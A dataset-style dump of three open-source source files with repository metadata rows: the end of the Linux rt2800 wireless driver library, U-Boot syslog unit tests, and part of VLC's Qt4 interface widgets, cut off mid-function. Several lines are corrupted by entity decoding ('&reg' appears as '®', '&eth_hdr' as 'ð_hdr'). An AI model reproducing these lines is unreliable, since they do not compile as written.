field.bit_offset = (queue_idx & 1) * 16;
field.bit_mask = 0xffff << field.bit_offset;
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, field, queue->txop);
rt2800_register_write(rt2x00dev, offset, reg);
/* Update WMM registers */
field.bit_offset = queue_idx * 4;
field.bit_mask = 0xf << field.bit_offset;
rt2800_register_read(rt2x00dev, WMM_AIFSN_CFG, ®);
rt2x00_set_field32(®, field, queue->aifs);
rt2800_register_write(rt2x00dev, WMM_AIFSN_CFG, reg);
rt2800_register_read(rt2x00dev, WMM_CWMIN_CFG, ®);
rt2x00_set_field32(®, field, queue->cw_min);
rt2800_register_write(rt2x00dev, WMM_CWMIN_CFG, reg);
rt2800_register_read(rt2x00dev, WMM_CWMAX_CFG, ®);
rt2x00_set_field32(®, field, queue->cw_max);
rt2800_register_write(rt2x00dev, WMM_CWMAX_CFG, reg);
/* Update EDCA registers */
offset = EDCA_AC0_CFG + (sizeof(u32) * queue_idx);
rt2800_register_read(rt2x00dev, offset, ®);
rt2x00_set_field32(®, EDCA_AC0_CFG_TX_OP, queue->txop);
rt2x00_set_field32(®, EDCA_AC0_CFG_AIFSN, queue->aifs);
rt2x00_set_field32(®, EDCA_AC0_CFG_CWMIN, queue->cw_min);
rt2x00_set_field32(®, EDCA_AC0_CFG_CWMAX, queue->cw_max);
rt2800_register_write(rt2x00dev, offset, reg);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_conf_tx);
u64 rt2800_get_tsf(struct ieee80211_hw *hw, struct ieee80211_vif *vif)
{
struct rt2x00_dev *rt2x00dev = hw->priv;
u64 tsf;
u32 reg;
rt2800_register_read(rt2x00dev, TSF_TIMER_DW1, ®);
tsf = (u64) rt2x00_get_field32(reg, TSF_TIMER_DW1_HIGH_WORD) << 32;
rt2800_register_read(rt2x00dev, TSF_TIMER_DW0, ®);
tsf |= rt2x00_get_field32(reg, TSF_TIMER_DW0_LOW_WORD);
return tsf;
}
EXPORT_SYMBOL_GPL(rt2800_get_tsf);
int rt2800_ampdu_action(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
enum ieee80211_ampdu_mlme_action action,
struct ieee80211_sta *sta, u16 tid, u16 *ssn,
u8 buf_size)
{
struct rt2x00_sta *sta_priv = (struct rt2x00_sta *)sta->drv_priv;
int ret = 0;
/*
* Don't allow aggregation for stations the hardware isn't aware
* of because tx status reports for frames to an unknown station
* always contain wcid=WCID_END+1 and thus we can't distinguish
* between multiple stations which leads to unwanted situations
* when the hw reorders frames due to aggregation.
*/
if (sta_priv->wcid > WCID_END)
return 1;
switch (action) {
case IEEE80211_AMPDU_RX_START:
case IEEE80211_AMPDU_RX_STOP:
/*
* The hw itself takes care of setting up BlockAck mechanisms.
* So, we only have to allow mac80211 to nagotiate a BlockAck
* agreement. Once that is done, the hw will BlockAck incoming
* AMPDUs without further setup.
*/
break;
case IEEE80211_AMPDU_TX_START:
ieee80211_start_tx_ba_cb_irqsafe(vif, sta->addr, tid);
break;
case IEEE80211_AMPDU_TX_STOP_CONT:
case IEEE80211_AMPDU_TX_STOP_FLUSH:
case IEEE80211_AMPDU_TX_STOP_FLUSH_CONT:
ieee80211_stop_tx_ba_cb_irqsafe(vif, sta->addr, tid);
break;
case IEEE80211_AMPDU_TX_OPERATIONAL:
break;
default:
rt2x00_warn((struct rt2x00_dev *)hw->priv,
"Unknown AMPDU action\n");
}
return ret;
}
EXPORT_SYMBOL_GPL(rt2800_ampdu_action);
int rt2800_get_survey(struct ieee80211_hw *hw, int idx,
struct survey_info *survey)
{
struct rt2x00_dev *rt2x00dev = hw->priv;
struct ieee80211_conf *conf = &hw->conf;
u32 idle, busy, busy_ext;
if (idx != 0)
return -ENOENT;
survey->channel = conf->chandef.chan;
rt2800_register_read(rt2x00dev, CH_IDLE_STA, &idle);
rt2800_register_read(rt2x00dev, CH_BUSY_STA, &busy);
rt2800_register_read(rt2x00dev, CH_BUSY_STA_SEC, &busy_ext);
if (idle || busy) {
survey->filled = SURVEY_INFO_TIME |
SURVEY_INFO_TIME_BUSY |
SURVEY_INFO_TIME_EXT_BUSY;
survey->time = (idle + busy) / 1000;
survey->time_busy = busy / 1000;
survey->time_ext_busy = busy_ext / 1000;
}
if (!(hw->conf.flags & IEEE80211_CONF_OFFCHANNEL))
survey->filled |= SURVEY_INFO_IN_USE;
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_get_survey);
MODULE_AUTHOR(DRV_PROJECT ", Bartlomiej Zolnierkiewicz");
MODULE_VERSION(DRV_VERSION);
MODULE_DESCRIPTION("Ralink RT2800 library");
MODULE_LICENSE("GPL");
| gpl-2.0 |
Stane1983/u-boot | test/log/syslog_test.c | 3 | 6774 | // SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (c) 2020, Heinrich Schuchardt <xypron.glpk@gmx.de>
*
* Logging function tests for CONFIG_LOG_SYSLOG=y.
*
* Invoke the test with: ./u-boot -d arch/sandbox/dts/test.dtb
*/
/* Override CONFIG_LOG_MAX_LEVEL */
#define LOG_DEBUG
#include <common.h>
#include <dm/device.h>
#include <hexdump.h>
#include <test/log.h>
#include <test/test.h>
#include <test/suites.h>
#include <test/ut.h>
#include <asm/eth.h>
#include "syslog_test.h"
DECLARE_GLOBAL_DATA_PTR;
int sb_log_tx_handler(struct udevice *dev, void *packet, unsigned int len)
{
struct eth_sandbox_priv *priv = dev_get_priv(dev);
struct sb_log_env *env = priv->priv;
/* uts is updated by the ut_assert* macros */
struct unit_test_state *uts = env->uts;
char *buf = packet;
struct ethernet_hdr *eth_hdr = packet;
struct ip_udp_hdr *ip_udp_hdr;
/* Check Ethernet header */
ut_asserteq_mem(ð_hdr->et_dest, net_bcast_ethaddr, ARP_HLEN);
ut_asserteq(ntohs(eth_hdr->et_protlen), PROT_IP);
/* Check IP header */
buf += sizeof(struct ethernet_hdr);
ip_udp_hdr = (struct ip_udp_hdr *)buf;
ut_asserteq(ip_udp_hdr->ip_p, IPPROTO_UDP);
ut_asserteq(ip_udp_hdr->ip_dst.s_addr, 0xffffffff);
ut_asserteq(ntohs(ip_udp_hdr->udp_dst), 514);
ut_asserteq(UDP_HDR_SIZE + strlen(env->expected) + 1,
ntohs(ip_udp_hdr->udp_len));
/* Check payload */
buf += sizeof(struct ip_udp_hdr);
ut_asserteq_mem(env->expected, buf,
ntohs(ip_udp_hdr->udp_len) - UDP_HDR_SIZE);
/* Signal that the callback function has been executed */
env->expected = NULL;
return 0;
}
int syslog_test_setup(struct unit_test_state *uts)
{
ut_assertok(log_device_set_enable(LOG_GET_DRIVER(syslog), true));
return 0;
}
int syslog_test_finish(struct unit_test_state *uts)
{
ut_assertok(log_device_set_enable(LOG_GET_DRIVER(syslog), false));
return 0;
}
/**
* log_test_syslog_err() - test log_err() function
*
* @uts: unit test state
* Return: 0 = success
*/
static int log_test_syslog_err(struct unit_test_state *uts)
{
int old_log_level = gd->default_log_level;
struct sb_log_env env;
ut_assertok(syslog_test_setup(uts));
gd->log_fmt = LOGF_TEST;
gd->default_log_level = LOGL_INFO;
env_set("ethact", "eth@10002000");
env_set("log_hostname", "sandbox");
env.expected = "<3>sandbox uboot: log_test_syslog_err() "
"testing log_err\n";
env.uts = uts;
sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
/* Used by ut_assert macros in the tx_handler */
sandbox_eth_set_priv(0, &env);
log_err("testing %s\n", "log_err");
/* Check that the callback function was called */
sandbox_eth_set_tx_handler(0, NULL);
gd->default_log_level = old_log_level;
gd->log_fmt = log_get_default_format();
ut_assertok(syslog_test_finish(uts));
return 0;
}
LOG_TEST(log_test_syslog_err);
/**
* log_test_syslog_warning() - test log_warning() function
*
* @uts: unit test state
* Return: 0 = success
*/
static int log_test_syslog_warning(struct unit_test_state *uts)
{
int old_log_level = gd->default_log_level;
struct sb_log_env env;
ut_assertok(syslog_test_setup(uts));
gd->log_fmt = LOGF_TEST;
gd->default_log_level = LOGL_INFO;
env_set("ethact", "eth@10002000");
env_set("log_hostname", "sandbox");
env.expected = "<4>sandbox uboot: log_test_syslog_warning() "
"testing log_warning\n";
env.uts = uts;
sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
/* Used by ut_assert macros in the tx_handler */
sandbox_eth_set_priv(0, &env);
log_warning("testing %s\n", "log_warning");
sandbox_eth_set_tx_handler(0, NULL);
/* Check that the callback function was called */
ut_assertnull(env.expected);
gd->default_log_level = old_log_level;
gd->log_fmt = log_get_default_format();
ut_assertok(syslog_test_finish(uts));
return 0;
}
LOG_TEST(log_test_syslog_warning);
/**
* log_test_syslog_notice() - test log_notice() function
*
* @uts: unit test state
* Return: 0 = success
*/
static int log_test_syslog_notice(struct unit_test_state *uts)
{
int old_log_level = gd->default_log_level;
struct sb_log_env env;
ut_assertok(syslog_test_setup(uts));
gd->log_fmt = LOGF_TEST;
gd->default_log_level = LOGL_INFO;
env_set("ethact", "eth@10002000");
env_set("log_hostname", "sandbox");
env.expected = "<5>sandbox uboot: log_test_syslog_notice() "
"testing log_notice\n";
env.uts = uts;
sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
/* Used by ut_assert macros in the tx_handler */
sandbox_eth_set_priv(0, &env);
log_notice("testing %s\n", "log_notice");
sandbox_eth_set_tx_handler(0, NULL);
/* Check that the callback function was called */
ut_assertnull(env.expected);
gd->default_log_level = old_log_level;
gd->log_fmt = log_get_default_format();
ut_assertok(syslog_test_finish(uts));
return 0;
}
LOG_TEST(log_test_syslog_notice);
/**
* log_test_syslog_info() - test log_info() function
*
* @uts: unit test state
* Return: 0 = success
*/
static int log_test_syslog_info(struct unit_test_state *uts)
{
int old_log_level = gd->default_log_level;
struct sb_log_env env;
ut_assertok(syslog_test_setup(uts));
gd->log_fmt = LOGF_TEST;
gd->default_log_level = LOGL_INFO;
env_set("ethact", "eth@10002000");
env_set("log_hostname", "sandbox");
env.expected = "<6>sandbox uboot: log_test_syslog_info() "
"testing log_info\n";
env.uts = uts;
sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
/* Used by ut_assert macros in the tx_handler */
sandbox_eth_set_priv(0, &env);
log_info("testing %s\n", "log_info");
sandbox_eth_set_tx_handler(0, NULL);
/* Check that the callback function was called */
ut_assertnull(env.expected);
gd->default_log_level = old_log_level;
gd->log_fmt = log_get_default_format();
ut_assertok(syslog_test_finish(uts));
return 0;
}
LOG_TEST(log_test_syslog_info);
/**
* log_test_syslog_debug() - test log_debug() function
*
* @uts: unit test state
* Return: 0 = success
*/
static int log_test_syslog_debug(struct unit_test_state *uts)
{
int old_log_level = gd->default_log_level;
struct sb_log_env env;
ut_assertok(syslog_test_setup(uts));
gd->log_fmt = LOGF_TEST;
gd->default_log_level = LOGL_DEBUG;
env_set("ethact", "eth@10002000");
env_set("log_hostname", "sandbox");
env.expected = "<7>sandbox uboot: log_test_syslog_debug() "
"testing log_debug\n";
env.uts = uts;
sandbox_eth_set_tx_handler(0, sb_log_tx_handler);
/* Used by ut_assert macros in the tx_handler */
sandbox_eth_set_priv(0, &env);
log_debug("testing %s\n", "log_debug");
sandbox_eth_set_tx_handler(0, NULL);
/* Check that the callback function was called */
ut_assertnull(env.expected);
gd->default_log_level = old_log_level;
gd->log_fmt = log_get_default_format();
ut_assertok(syslog_test_finish(uts));
return 0;
}
LOG_TEST(log_test_syslog_debug);
| gpl-2.0 |
xinran505982/videolan_vlc | modules/gui/qt4/components/interface_widgets.cpp | 3 | 26111 | /*****************************************************************************
* interface_widgets.cpp : Custom widgets for the main interface
****************************************************************************
* Copyright (C) 2006-2010 the VideoLAN team
* $Id$
*
* Authors: Clément Stenac <zorglub@videolan.org>
* Jean-Baptiste Kempf <jb@videolan.org>
* Rafaël Carré <funman@videolanorg>
* Ilkka Ollakka <ileoo@videolan.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* ( at your option ) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston MA 02110-1301, USA.
*****************************************************************************/
#ifdef HAVE_CONFIG_H
# include "config.h"
#endif
#include "qt4.hpp"
#include "components/interface_widgets.hpp"
#include "dialogs_provider.hpp"
#include "util/customwidgets.hpp" // qtEventToVLCKey, QVLCStackedWidget
#include "menus.hpp" /* Popup menu on bgWidget */
#include <QLabel>
#include <QToolButton>
#include <QPalette>
#include <QEvent>
#include <QResizeEvent>
#include <QDate>
#include <QMenu>
#include <QWidgetAction>
#include <QDesktopWidget>
#include <QPainter>
#include <QTimer>
#include <QSlider>
#include <QBitmap>
#include <QUrl>
#ifdef QT5_HAS_X11
# define Q_WS_X11
#endif
#ifdef Q_WS_X11
# include <X11/Xlib.h>
# include <qx11info_x11.h>
#endif
#include <math.h>
#include <assert.h>
#include <vlc_vout.h>
#include <vlc_vout_window.h>
/**********************************************************************
* Video Widget. A simple frame on which video is drawn
* This class handles resize issues
**********************************************************************/
VideoWidget::VideoWidget( intf_thread_t *_p_i )
: QFrame( NULL ) , p_intf( _p_i )
{
/* Set the policy to expand in both directions */
// setSizePolicy( QSizePolicy::Expanding, QSizePolicy::Expanding );
layout = new QHBoxLayout( this );
layout->setContentsMargins( 0, 0, 0, 0 );
stable = NULL;
p_window = NULL;
show();
}
VideoWidget::~VideoWidget()
{
/* Ensure we are not leaking the video output. This would crash. */
assert( !stable );
assert( !p_window );
}
void VideoWidget::sync( void )
{
#ifdef Q_WS_X11
/* Make sure the X server has processed all requests.
* This protects other threads using distinct connections from getting
* the video widget window in an inconsistent states. */
XSync( QX11Info::display(), False );
#endif
}
/**
* Request the video to avoid the conflicts
**/
WId VideoWidget::request( struct vout_window_t *p_wnd, unsigned int *pi_width,
unsigned int *pi_height, bool b_keep_size )
{
if( stable )
{
msg_Dbg( p_intf, "embedded video already in use" );
return 0;
}
assert( !p_window );
if( b_keep_size )
{
*pi_width = size().width();
*pi_height = size().height();
}
/* The owner of the video window needs a stable handle (WinId). Reparenting
* in Qt4-X11 changes the WinId of the widget, so we need to create another
* dummy widget that stays within the reparentable widget. */
stable = new QWidget();
QPalette plt = palette();
plt.setColor( QPalette::Window, Qt::black );
stable->setPalette( plt );
stable->setAutoFillBackground(true);
/* Force the widget to be native so that it gets a winId() */
stable->setAttribute( Qt::WA_NativeWindow, true );
/* Indicates that the widget wants to draw directly onto the screen.
Widgets with this attribute set do not participate in composition
management */
/* This is currently disabled on X11 as it does not seem to improve
* performance, but causes the video widget to be transparent... */
#if !defined (Q_WS_X11) && !defined (Q_WS_QPA)
stable->setAttribute( Qt::WA_PaintOnScreen, true );
#endif
layout->addWidget( stable );
#ifdef Q_WS_X11
/* HACK: Only one X11 client can subscribe to mouse button press events.
* VLC currently handles those in the video display.
* Force Qt4 to unsubscribe from mouse press and release events. */
Display *dpy = QX11Info::display();
Window w = stable->winId();
XWindowAttributes attr;
XGetWindowAttributes( dpy, w, &attr );
attr.your_event_mask &= ~(ButtonPressMask|ButtonReleaseMask);
XSelectInput( dpy, w, attr.your_event_mask );
#endif
sync();
p_window = p_wnd;
return stable->winId();
}
/* Set the Widget to the correct Size */
/* Function has to be called by the parent
Parent has to care about resizing itself */
void VideoWidget::SetSizing( unsigned int w, unsigned int h )
{
resize( w, h );
emit sizeChanged( w, h );
/* Work-around a bug?misconception? that would happen when vout core resize
twice to the same size and would make the vout not centered.
This cause a small flicker.
See #3621
*/
if( (unsigned)size().width() == w && (unsigned)size().height() == h )
updateGeometry();
sync();
}
void VideoWidget::resizeEvent( QResizeEvent *event )
{
if( p_window != NULL )
vout_window_ReportSize( p_window, event->size().width(),
event->size().height() );
QWidget::resizeEvent( event );
}
void VideoWidget::release( void )
{
msg_Dbg( p_intf, "Video is not needed anymore" );
if( stable )
{
layout->removeWidget( stable );
stable->deleteLater();
stable = NULL;
p_window = NULL;
}
updateGeometry();
}
/**********************************************************************
* Background Widget. Show a simple image background. Currently,
* it's album art if present or cone.
**********************************************************************/
BackgroundWidget::BackgroundWidget( intf_thread_t *_p_i )
:QWidget( NULL ), p_intf( _p_i ), b_expandPixmap( false ), b_withart( true )
{
/* A dark background */
setAutoFillBackground( true );
QPalette plt = palette();
plt.setColor( QPalette::Active, QPalette::Window , Qt::black );
plt.setColor( QPalette::Inactive, QPalette::Window , Qt::black );
setPalette( plt );
/* Init the cone art */
defaultArt = QString( ":/logo/vlc128.png" );
updateArt( "" );
/* fade in animator */
setProperty( "opacity", 1.0 );
fadeAnimation = new QPropertyAnimation( this, "opacity", this );
fadeAnimation->setDuration( 1000 );
fadeAnimation->setStartValue( 0.0 );
fadeAnimation->setEndValue( 1.0 );
fadeAnimation->setEasingCurve( QEasingCurve::OutSine );
CONNECT( fadeAnimation, valueChanged( const QVariant & ),
this, update() );
CONNECT( THEMIM->getIM(), artChanged( QString ),
this, updateArt( const QString& ) );
}
void BackgroundWidget::updateArt( const QString& url )
{
if ( !url.isEmpty() )
pixmapUrl = url;
else
pixmapUrl = defaultArt;
update();
}
void BackgroundWidget::showEvent( QShowEvent * e )
{
Q_UNUSED( e );
if ( b_withart ) fadeAnimation->start();
}
void BackgroundWidget::paintEvent( QPaintEvent *e )
{
if ( !b_withart )
{
/* we just want background autofill */
QWidget::paintEvent( e );
return;
}
int i_maxwidth, i_maxheight;
QPixmap pixmap = QPixmap( pixmapUrl );
QPainter painter(this);
QBitmap pMask;
float f_alpha = 1.0;
i_maxwidth = __MIN( maximumWidth(), width() ) - MARGIN * 2;
i_maxheight = __MIN( maximumHeight(), height() ) - MARGIN * 2;
painter.setOpacity( property( "opacity" ).toFloat() );
if ( height() > MARGIN * 2 )
{
/* Scale down the pixmap if the widget is too small */
if( pixmap.width() > i_maxwidth || pixmap.height() > i_maxheight )
{
pixmap = pixmap.scaled( i_maxwidth, i_maxheight,
Qt::KeepAspectRatio, Qt::SmoothTransformation );
}
else
if ( b_expandPixmap &&
pixmap.width() < width() && pixmap.height() < height() )
{
/* Scale up the pixmap to fill widget's size */
f_alpha = ( (float) pixmap.height() / (float) height() );
pixmap = pixmap.scaled(
width() - MARGIN * 2,
height() - MARGIN * 2,
Qt::KeepAspectRatio,
( f_alpha < .2 )? /* Don't waste cpu when not visible */
Qt::SmoothTransformation:
Qt::FastTransformation
);
/* Non agressive alpha compositing when sizing up */
pMask = QBitmap( pixmap.width(), pixmap.height() );
pMask.fill( QColor::fromRgbF( 1.0, 1.0, 1.0, f_alpha ) );
pixmap.setMask( pMask );
}
painter.drawPixmap(
MARGIN + ( i_maxwidth - pixmap.width() ) /2,
MARGIN + ( i_maxheight - pixmap.height() ) /2,
pixmap);
}
QWidget::paintEvent( e );
}
void BackgroundWidget::contextMenuEvent( QContextMenuEvent *event )
{
THEDP->setPopupMenu();
event->accept();
}
EasterEggBackgroundWidget::EasterEggBackgroundWidget( intf_thread_t *p_intf )
: BackgroundWidget( p_intf )
{
flakes = new QLinkedList<flake *>();
i_rate = 2;
i_speed = 1;
b_enabled = false;
timer = new QTimer( this );
timer->setInterval( 100 );
CONNECT( timer, timeout(), this, spawnFlakes() );
if ( isVisible() && b_enabled ) timer->start();
defaultArt = QString( ":/logo/vlc128-xmas.png" );
updateArt( "" );
}
EasterEggBackgroundWidget::~EasterEggBackgroundWidget()
{
timer->stop();
delete timer;
reset();
delete flakes;
}
void EasterEggBackgroundWidget::showEvent( QShowEvent *e )
{
if ( b_enabled ) timer->start();
BackgroundWidget::showEvent( e );
}
void EasterEggBackgroundWidget::hideEvent( QHideEvent *e )
{
timer->stop();
reset();
BackgroundWidget::hideEvent( e );
}
void EasterEggBackgroundWidget::resizeEvent( QResizeEvent *e )
{
reset();
BackgroundWidget::resizeEvent( e );
}
void EasterEggBackgroundWidget::animate()
{
b_enabled = true;
if ( isVisible() ) timer->start();
}
void EasterEggBackgroundWidget::spawnFlakes()
{
if ( ! isVisible() ) return;
double w = (double) width() / RAND_MAX;
int i_spawn = ( (double) qrand() / RAND_MAX ) * i_rate;
QLinkedList<flake *>::iterator it = flakes->begin();
while( it != flakes->end() )
{
flake *current = *it;
current->point.setY( current->point.y() + i_speed );
if ( current->point.y() + i_speed >= height() )
{
delete current;
it = flakes->erase( it );
}
else
it++;
}
if ( flakes->size() < MAX_FLAKES )
for ( int i=0; i<i_spawn; i++ )
{
flake *f = new flake;
f->point.setX( qrand() * w );
f->b_fat = ( qrand() < ( RAND_MAX * .33 ) );
flakes->append( f );
}
update();
}
void EasterEggBackgroundWidget::reset()
{
while ( !flakes->isEmpty() )
delete flakes->takeFirst();
}
void EasterEggBackgroundWidget::paintEvent( QPaintEvent *e )
{
QPainter painter(this);
painter.setBrush( QBrush( QColor(Qt::white) ) );
painter.setPen( QPen(Qt::white) );
QLinkedList<flake *>::const_iterator it = flakes->constBegin();
while( it != flakes->constEnd() )
{
const flake * const f = *(it++);
if ( f->b_fat )
{
/* Xsnow like :p */
painter.drawPoint( f->point.x(), f->point.y() -1 );
painter.drawPoint( f->point.x() + 1, f->point.y() );
painter.drawPoint( f->point.x(), f->point.y() +1 );
painter.drawPoint( f->point.x() - 1, f->point.y() );
}
else
{
painter.drawPoint( f->point );
}
}
BackgroundWidget::paintEvent( e );
}
#if 0
#include <QPushButton>
#include <QHBoxLayout>
/**********************************************************************
* Visualization selector panel
**********************************************************************/
VisualSelector::VisualSelector( intf_thread_t *_p_i ) :
QFrame( NULL ), p_intf( _p_i )
{
QHBoxLayout *layout = new QHBoxLayout( this );
layout->setMargin( 0 );
QPushButton *prevButton = new QPushButton( "Prev" );
QPushButton *nextButton = new QPushButton( "Next" );
layout->addWidget( prevButton );
layout->addWidget( nextButton );
layout->addStretch( 10 );
layout->addWidget( new QLabel( qtr( "Current visualization" ) ) );
current = new QLabel( qtr( "None" ) );
layout->addWidget( current );
BUTTONACT( prevButton, prev() );
BUTTONACT( nextButton, next() );
setLayout( layout );
setMaximumHeight( 35 );
}
VisualSelector::~VisualSelector()
{}
void VisualSelector::prev()
{
char *psz_new = aout_VisualPrev( p_intf );
if( psz_new )
{
current->setText( qfu( psz_new ) );
free( psz_new );
}
}
void VisualSelector::next()
{
char *psz_new = aout_VisualNext( p_intf );
if( psz_new )
{
current->setText( qfu( psz_new ) );
free( psz_new );
}
}
#endif
SpeedLabel::SpeedLabel( intf_thread_t *_p_intf, QWidget *parent )
: QLabel( parent ), p_intf( _p_intf )
{
tooltipStringPattern = qtr( "Current playback speed: %1\nClick to adjust" );
/* Create the Speed Control Widget */
speedControl = new SpeedControlWidget( p_intf, this );
speedControlMenu = new QMenu( this );
QWidgetAction *widgetAction = new QWidgetAction( speedControl );
widgetAction->setDefaultWidget( speedControl );
speedControlMenu->addAction( widgetAction );
/* Change the SpeedRate in the Label */
CONNECT( THEMIM->getIM(), rateChanged( float ), this, setRate( float ) );
DCONNECT( THEMIM, inputChanged( input_thread_t * ),
speedControl, activateOnState() );
setContentsMargins(4, 0, 4, 0);
setRate( var_InheritFloat( THEPL, "rate" ) );
}
SpeedLabel::~SpeedLabel()
{
delete speedControlMenu;
}
/****************************************************************************
* Small right-click menu for rate control
****************************************************************************/
void SpeedLabel::showSpeedMenu( QPoint pos )
{
speedControlMenu->exec( QCursor::pos() - pos
+ QPoint( -70 + width()/2, height() ) );
}
void SpeedLabel::setRate( float rate )
{
QString str;
str.setNum( rate, 'f', 2 );
str.append( "x" );
setText( str );
setToolTip( tooltipStringPattern.arg( str ) );
speedControl->updateControls( rate );
}
/**********************************************************************
* Speed control widget
**********************************************************************/
SpeedControlWidget::SpeedControlWidget( intf_thread_t *_p_i, QWidget *_parent )
: QFrame( _parent ), p_intf( _p_i )
{
QSizePolicy sizePolicy( QSizePolicy::Fixed, QSizePolicy::Maximum );
sizePolicy.setHorizontalStretch( 0 );
sizePolicy.setVerticalStretch( 0 );
speedSlider = new QSlider( this );
speedSlider->setSizePolicy( sizePolicy );
speedSlider->setMinimumSize( QSize( 140, 20 ) );
speedSlider->setOrientation( Qt::Horizontal );
speedSlider->setTickPosition( QSlider::TicksBelow );
speedSlider->setRange( -34, 34 );
speedSlider->setSingleStep( 1 );
speedSlider->setPageStep( 1 );
speedSlider->setTickInterval( 17 );
CONNECT( speedSlider, valueChanged( int ), this, updateRate( int ) );
QToolButton *normalSpeedButton = new QToolButton( this );
normalSpeedButton->setMaximumSize( QSize( 26, 16 ) );
normalSpeedButton->setAutoRaise( true );
normalSpeedButton->setText( "1x" );
normalSpeedButton->setToolTip( qtr( "Revert to normal play speed" ) );
CONNECT( normalSpeedButton, clicked(), this, resetRate() );
QToolButton *slowerButton = new QToolButton( this );
slowerButton->setMaximumSize( QSize( 26, 16 ) );
slowerButton->setAutoRaise( true );
slowerButton->setToolTip( tooltipL[SLOWER_BUTTON] );
slowerButton->setIcon( QIcon( iconL[SLOWER_BUTTON] ) );
CONNECT( slowerButton, clicked(), THEMIM->getIM(), slower() );
QToolButton *fasterButton = new QToolButton( this );
fasterButton->setMaximumSize( QSize( 26, 16 ) );
fasterButton->setAutoRaise( true );
fasterButton->setToolTip( tooltipL[FASTER_BUTTON] );
fasterButton->setIcon( QIcon( iconL[FASTER_BUTTON] ) );
CONNECT( fasterButton, clicked(), THEMIM->getIM(), faster() );
/* spinBox = new QDoubleSpinBox();
spinBox->setDecimals( 2 );
spinBox->setMaximum( 32 );
spinBox->setMinimum( 0.03F );
spinBox->setSingleStep( 0.10F );
spinBox->setAlignment( Qt::AlignRight );
CONNECT( spinBox, valueChanged( double ), this, updateSpinBoxRate( double ) ); */
QGridLayout* speedControlLayout = new QGridLayout( this );
speedControlLayout->addWidget( speedSlider, 0, 0, 1, 3 );
speedControlLayout->addWidget( slowerButton, 1, 0 );
speedControlLayout->addWidget( normalSpeedButton, 1, 1, 1, 1, Qt::AlignRight );
speedControlLayout->addWidget( fasterButton, 1, 2, 1, 1, Qt::AlignRight );
//speedControlLayout->addWidget( spinBox );
speedControlLayout->setContentsMargins( 0, 0, 0, 0 );
speedControlLayout->setSpacing( 0 );
lastValue = 0;
activateOnState();
}
void SpeedControlWidget::activateOnState()
{
speedSlider->setEnabled( THEMIM->getIM()->hasInput() );
//spinBox->setEnabled( THEMIM->getIM()->hasInput() );
}
void SpeedControlWidget::updateControls( float rate )
{
if( speedSlider->isSliderDown() )
{
//We don't want to change anything if the user is using the slider
return;
}
double value = 17 * log( rate ) / log( 2. );
int sliderValue = (int) ( ( value > 0 ) ? value + .5 : value - .5 );
if( sliderValue < speedSlider->minimum() )
{
sliderValue = speedSlider->minimum();
}
else if( sliderValue > speedSlider->maximum() )
{
sliderValue = speedSlider->maximum();
}
lastValue = sliderValue;
speedSlider->setValue( sliderValue );
//spinBox->setValue( rate );
}
void SpeedControlWidget::updateRate( int sliderValue )
{
if( sliderValue == lastValue )
return;
double speed = pow( 2, (double)sliderValue / 17 );
int rate = INPUT_RATE_DEFAULT / speed;
THEMIM->getIM()->setRate(rate);
//spinBox->setValue( var_InheritFloat( THEPL, "rate" ) );
}
void SpeedControlWidget::updateSpinBoxRate( double r )
{
var_SetFloat( THEPL, "rate", r );
}
void SpeedControlWidget::resetRate()
{
THEMIM->getIM()->setRate( INPUT_RATE_DEFAULT );
}
CoverArtLabel::CoverArtLabel( QWidget *parent, intf_thread_t *_p_i )
: QLabel( parent ), p_intf( _p_i ), p_item( NULL )
{
setContextMenuPolicy( Qt::ActionsContextMenu );
CONNECT( THEMIM->getIM(), artChanged( input_item_t * ),
this, showArtUpdate( input_item_t * ) );
setMinimumHeight( 128 );
setMinimumWidth( 128 );
setScaledContents( false );
setAlignment( Qt::AlignCenter );
QAction *action = new QAction( qtr( "Download cover art" ), this );
CONNECT( action, triggered(), this, askForUpdate() );
addAction( action );
action = new QAction( qtr( "Add cover art from file" ), this );
CONNECT( action, triggered(), this, setArtFromFile() );
addAction( action );
p_item = THEMIM->currentInputItem();
if( p_item )
{
vlc_gc_incref( p_item );
showArtUpdate( p_item );
}
else
showArtUpdate( "" );
}
CoverArtLabel::~CoverArtLabel()
{
QList< QAction* > artActions = actions();
foreach( QAction *act, artActions )
removeAction( act );
if ( p_item ) vlc_gc_decref( p_item );
}
void CoverArtLabel::setItem( input_item_t *_p_item )
{
if ( p_item ) vlc_gc_decref( p_item );
p_item = _p_item;
if ( p_item ) vlc_gc_incref( p_item );
}
void CoverArtLabel::showArtUpdate( const QString& url )
{
QPixmap pix;
if( !url.isEmpty() && pix.load( url ) )
{
pix = pix.scaled( minimumWidth(), minimumHeight(),
Qt::KeepAspectRatioByExpanding,
Qt::SmoothTransformation );
}
else
{
pix = QPixmap( ":/noart.png" );
}
setPixmap( pix );
}
void CoverArtLabel::showArtUpdate( input_item_t *_p_item )
{
/* not for me */
if ( _p_item != p_item )
return;
QString url;
if ( _p_item ) url = THEMIM->getIM()->decodeArtURL( _p_item );
showArtUpdate( url );
}
void CoverArtLabel::askForUpdate()
{
THEMIM->getIM()->requestArtUpdate( p_item, true );
}
void CoverArtLabel::setArtFromFile()
{
if( !p_item )
return;
QString filePath = QFileDialog::getOpenFileName( this, qtr( "Choose Cover Art" ),
p_intf->p_sys->filepath, qtr( "Image Files (*.gif *.jpg *.jpeg *.png)" ) );
if( filePath.isEmpty() )
return;
QString fileUrl = QUrl::fromLocalFile( filePath ).toString();
THEMIM->getIM()->setArt( p_item, fileUrl );
}
void CoverArtLabel::clear()
{
showArtUpdate( "" );
}
TimeLabel::TimeLabel( intf_thread_t *_p_intf, TimeLabel::Display _displayType )
: ClickableQLabel(), p_intf( _p_intf ), displayType( _displayType )
{
b_remainingTime = false;
